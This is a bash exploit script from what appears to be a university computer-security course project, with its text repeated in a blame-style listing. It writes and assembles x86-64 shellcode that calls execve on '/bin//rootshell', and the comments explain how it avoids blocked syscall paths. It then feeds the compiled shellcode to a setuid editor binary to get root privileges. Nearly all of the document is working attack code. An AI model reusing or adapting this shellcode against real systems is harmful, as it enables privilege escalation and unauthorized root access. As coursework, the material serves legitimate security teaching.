csci5271/bcvi/exploit.1.1.sh

#!/bin/bash
# Exploit handcrafted by Team Shell Smash.
# zhan4854, beach144, jerus005

# Shellcode
cat > shellcode.s << EOF
bits 64
# Pad with four zeros
db 0x00, 0x00, 0x00, 0x00

push rbp
# Pushing 0x00000000, which is the second argument of argv[]
xor rax, rax
push rax

# The string "/bin//rootshell", literally
mov rdi, 0x006c6c656873746f
push rdi
mov rdi, 0x6f722f2f6e69622f
push rdi

# 1st argument (filename)
mov rdi, rsp
# 3rd argument (envp), should be 0x00000000
push rax
mov rdx, rsp
# 2nd argument (argv), is a pointer to 1st argument
push rbx
mov rsi, rsp

# 0x3b, or 59 is the syscall number for execve
mov al, 0x3b
# Blocking int 0x80 and sysenter but not syscall? lol
syscall
ret
EOF

# Compile to bin
nasm -f bin -o shellcode shellcode.s

# Execute
echo "llllR" | sudobcvi64 shellcode
f 2018-01-29 23:30:43 +00:00			`#!/bin/bash`
			`# Exploit handcrafted by Team Shell Smash.`
			`# zhan4854, beach144, jerus005`

			`# Shellcode`
			`cat > shellcode.s << EOF`
			`bits 64`
			`# Pad with four zeros`
			`db 0x00, 0x00, 0x00, 0x00`

			`push rbp`
			`# Pushing 0x00000000, which is the second argument of argv[]`
			`xor rax, rax`
			`push rax`

			`# The string "/bin//rootshell", literally`
			`mov rdi, 0x006c6c656873746f`
			`push rdi`
			`mov rdi, 0x6f722f2f6e69622f`
			`push rdi`

			`# 1st argument (filename)`
			`mov rdi, rsp`
			`# 3rd argument (envp), should be 0x00000000`
			`push rax`
			`mov rdx, rsp`
			`# 2nd argument (argv), is a pointer to 1st argument`
			`push rbx`
			`mov rsi, rsp`

			`# 0x3b, or 59 is the syscall number for execve`
			`mov al, 0x3b`
			`# Blocking int 0x80 and sysenter but not syscall? lol`
			`syscall`
			`ret`
			`EOF`

			`# Compile to bin`
			`nasm -f bin -o shellcode shellcode.s`

			`# Execute`
			`echo "llllR" \| sudobcvi64 shellcode`